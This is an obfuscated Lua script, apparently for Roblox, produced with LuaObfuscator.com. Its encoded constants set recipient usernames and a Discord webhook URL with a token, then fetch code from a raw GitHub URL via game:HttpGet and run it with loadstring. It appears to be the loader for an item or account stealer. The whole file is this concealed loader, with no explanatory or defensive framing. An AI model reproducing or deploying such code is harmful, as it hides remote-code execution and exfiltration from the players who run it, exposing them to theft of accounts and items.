--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v83,v19);v19=nil;v90=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-(2 -1))))%((2 + 0)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + (286 -85))))) ;return v85-(v85%(928 -(214 + (1778 -(68 + 997))))) ;end end else local v86=((1271 -(226 + 1044)) + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end local function v21()local v34=(0 + 0) -0 ;local v35;while true do if (v34==1) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (16777566 -(87 + 263))) + (v41 * (65716 -(67 + 113))) + (v40 * (188 + 68)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;v38=1;end end end local function v24()local v43=0 -(0 -0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(955 -(802 + 137 + 13))) then if (v48==(430 -(44 + 386))) then if (v47==(0 -0)) then return v49 * (0 -0) ;else local v97=0 + 0 ;while true do if ((772 -(201 + (1290 -719)))==v97) then v48=998 -(915 + 82) ;v46=0 -(0 + 0) ;break;end end end elseif (v48==(5796 -3749)) then return ((v47==(0 + (0 -0))) and (v49 * ((3 -2)/(859 -(814 + 45))))) or (v49 * NaN) ;end return v8(v49,v48-(1344 -321) ) * (v46 + (v47/((1 + 1)^(1239 -(1069 + 118))))) ;end if (v43==((7 -5) -1)) then v46=886 -(261 + 6 + 618) ;v47=(v20(v45,1 -0 ,(34 + 9) -23 ) * ((1425 -(630 + 793))^(6 + (1081 -(87 + 968))))) + v44 ;v43=3 -1 ;end if ((0 + 0)==v43) then v44=v23();v45=v23();v43=792 -(368 + 423) ;end if ((6 -4)==v43) then v48=v20(v45,21,49 -(10 + 8) );v49=((v20(v45,122 -90 )==(443 -(416 + 26))) and  -((704 -(376 + 325)) -2)) or ((1 -0) + 0) ;v43=(12 -8) -1 ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;local v52={};for v67=15 -(9 + 5) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=(2 + 1)) then else v60=nil;while true do local v92=0 + 0 ;while true do if (v92==(1985 -(1266 + 719))) then if (v54~=(1552 -(1126 + 425))) then else local v98=405 -(118 + 287) ;while true do if ((604 -(268 + 335))==v98) then v60={};v54=7 -5 ;break;end if (v98~=0) then else v58={v55,v56,nil,v57};v59=v23();v98=378 -(142 + 235) ;end end end if (v54~=(1459 -(282 + 1174))) then else local v99=0;while true do if ((811 -(569 + 242))==v99) then for v143=2 -1 ,v23() do v56[v143-1 ]=v28();end return v58;end end end v92=1;end if (v92~=(1 + 0)) then else if ((977 -(553 + 424))==v54) then local v100=0 + 0 ;while true do if (v100==(1 -0)) then v57={};v54=1 + 0 ;break;end if (v100==(1024 -(706 + 318))) then v55={};v56={};v100=1252 -(721 + 530) ;end end end if (v54~=(1 + 1)) then else local v101=0 + 0 ;while true do if (v101~=(1272 -(945 + 326))) then else for v145=2 -1 ,v23() do local v146=0;local v147;local v148;local v149;while true do if (0~=v146) then else v147=0;v148=nil;v146=2 -1 ;end if (v146~=1) then else v149=nil;while true do if (v147~=(0 -0)) then else local v162=0 + 0 ;while true do if (v162==(0 + 0)) then v148=700 -(271 + 429) ;v149=nil;v162=1 + 0 ;end if (v162==1) then v147=1501 -(1408 + 92) ;break;end end end if (v147==(1087 -(461 + 625))) then while true do if (v148~=(0 + 0)) then else v149=v21();if (v20(v149,1289 -(993 + 295) ,1 + 0 )~=(0 -0)) then else local v165=1171 -(418 + 753) ;local v166;local v167;local v168;local v169;local v170;while true do if ((732 -(476 + 255))==v165) then v168=nil;v169=nil;v165=1 + 1 ;end if (v165~=(0 + 0)) then else v166=0;v167=nil;v165=1 + 0 ;end if (v165==2) then v170=nil;while true do if (0==v166) then local v171=0 + 0 ;while true do if (v171~=0) then else v167=0;v168=nil;v171=1 + 0 ;end if (v171~=1) then else v166=1 -0 ;break;end end end if (v166~=2) then else while true do if (v167==(531 -(406 + 123))) then local v173=1769 -(1749 + 20) ;while true do if (v173~=(239 -(64 + 174))) then else v167=3;break;end if (v173==(0 + 0)) then if (v20(v169,1 -0 ,1323 -(1249 + 73) )~=1) then else v170[1 + 1 ]=v60[v170[1147 -(466 + 679) ]];end if (v20(v169,4 -2 ,2)==(2 -1)) then v170[3]=v60[v170[3]];end v173=1901 -(106 + 1794) ;end end end if (v167~=(219 -(42 + 174))) then else if (v20(v169,3 + 0 ,3 + 0 )==(1 + 0)) then v170[1508 -(363 + 1141) ]=v60[v170[2 + 2 ]];end v55[v145]=v170;break;end if (v167~=(1581 -(1183 + 397))) then else v170={v22(),v22(),nil,nil};if (v168==(0 -0)) then local v179=0 + 0 ;local v180;local v181;while true do if (v179==(115 -(4 + 110))) then while true do if (v180~=(584 -(57 + 527))) then else v181=1427 -(41 + 1386) ;while true do if (v181==(103 -(17 + 86))) then v170[3 + 0 ]=v22();v170[8 -4 ]=v22();break;end end break;end end break;end if (v179==(0 -0)) then v180=0 -0 ;v181=nil;v179=167 -(122 + 44) ;end end elseif (v168==(1 -0)) then v170[3]=v23();elseif (v168==2) then v170[859 -(564 + 292) ]=v23() -((6 -4)^(14 + 2)) ;elseif (v168~=(1 + 2)) then else local v189=0 -0 ;local v190;while true do if (v189==0) then v190=0 -0 ;while true do if (v190==(0 -0)) then v170[307 -(244 + 60) ]=v23() -(2^16) ;v170[4]=v22();break;end end break;end end end v167=2;end if (v167==(65 -(30 + 35))) then local v175=476 -(41 + 435) ;local v176;while true do if (v175==0) then v176=0 + 0 ;while true do if (v176~=(0 + 0)) then else local v188=1257 -(1043 + 214) ;while true do if (v188==0) then v168=v20(v149,7 -5 ,3);v169=v20(v149,1216 -(323 + 889) ,6);v188=2 -1 ;end if (v188~=(581 -(361 + 219))) then else v176=321 -(53 + 267) ;break;end end end if (v176==1) then v167=1 + 0 ;break;end end break;end end end end break;end if ((1139 -(782 + 356))~=v166) then else local v172=0;while true do if (v172==(413 -(15 + 398))) then v169=nil;v170=nil;v172=983 -(18 + 964) ;end if (v172==(2 -1)) then v166=2 -0 ;break;end end end end break;end end end break;end end break;end end break;end end end v54=1095 -(975 + 117) ;break;end if (v101==(0 -0)) then for v150=1,v59 do local v151=0 + 0 ;local v152;local v153;local v154;local v155;while true do if (v151~=0) then else v152=1875 -(157 + 1718) ;v153=nil;v151=1 + 0 ;end if (v151~=2) then else while true do if (v152==(851 -(20 + 830))) then v155=nil;while true do if (v153~=(0 -0)) then else local v163=0 + 0 ;while true do if ((127 -(116 + 10))~=v163) then else v153=1;break;end if ((0 -0)~=v163) then else v154=v21();v155=nil;v163=1 + 0 ;end end end if (v153~=(1 -0)) then else if (v154==(2 -1)) then v155=v21()~=0 ;elseif (v154==(740 -(542 + 196))) then v155=v24();elseif (v154==(6 -3)) then v155=v25();end v60[v150]=v155;break;end end break;end if (v152~=0) then else v153=0 -0 ;v154=nil;v152=1;end end break;end if (v151~=(1 + 0)) then else v154=nil;v155=nil;v151=5 -3 ;end end end v58[1230 -(322 + 905) ]=v21();v101=1 + 0 ;end end end break;end end end break;end if (v53==(1 + 1)) then v58=nil;v59=nil;v53=3;end if (v53~=(1189 -(449 + 740))) then else v54=872 -(826 + 46) ;v55=nil;v53=948 -(245 + 702) ;end if (v53~=1) then else v56=nil;v57=nil;v53=4 -2 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=8) then if (v82<=3) then if (v82<=1) then if (v82>0) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]();end elseif (v82==2) then v79[v81[2]]=v81[3]~=0 ;else v79[v81[2]]=v81[3];end elseif (v82<=5) then if (v82>4) then local v107=v81[2];local v108=v79[v81[3]];v79[v107 + 1 ]=v108;v79[v107]=v108[v81[4]];else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=6) then local v114=v81[2];local v115,v116=v72(v79[v114](v13(v79,v114 + 1 ,v81[3])));v74=(v116 + v114) -1 ;local v117=0;for v130=v114,v74 do v117=v117 + 1 ;v79[v130]=v115[v117];end elseif (v82>7) then v79[v81[2]]=v63[v81[3]];else do return;end end elseif (v82<=12) then if (v82<=10) then if (v82>9) then local v118=0;local v119;local v120;local v121;local v122;while true do if (1==v118) then v74=(v121 + v119) -1 ;v122=0;v118=2;end if (v118==2) then for v159=v119,v74 do v122=v122 + 1 ;v79[v159]=v120[v122];end break;end if (v118==0) then v119=v81[2];v120,v121=v72(v79[v119](v13(v79,v119 + 1 ,v81[3])));v118=1;end end else v79[v81[2]]=v63[v81[3]];end elseif (v82==11) then v79[v81[2]]();else do return;end end elseif (v82<=14) then if (v82>13) then local v125=v81[2];v79[v125]=v79[v125](v13(v79,v125 + 1 ,v74));else local v127=0;local v128;while true do if (v127==0) then v128=v81[2];v79[v128]=v79[v128](v13(v79,v128 + 1 ,v74));break;end end end elseif (v82<=15) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>16) then v79[v81[2]]=v81[3];else local v138=v81[2];local v139=v79[v81[3]];v79[v138 + 1 ]=v139;v79[v138]=v139[v81[4]];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365724E616D65030C3O004772696E64546F546F70313303093O00557365724E616D6532030F3O004E6F7468696E67746F53756D50535803073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31373432333237333539333031323331342F48664A41706A4E454B727759614145736C61726F5547496A7933657431717235535037344A303353446F773574582O3155487A4874594459536A6648614977626D47496F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012093O00013O0030043O000200030012093O00013O0030043O000400050012093O00013O0030043O000600070012093O00083O001209000100093O00201000010001000A0012110003000B4O000F000400014O000A000100044O000E5O00022O000B3O000100012O000C3O00017O00",v9(),...);end
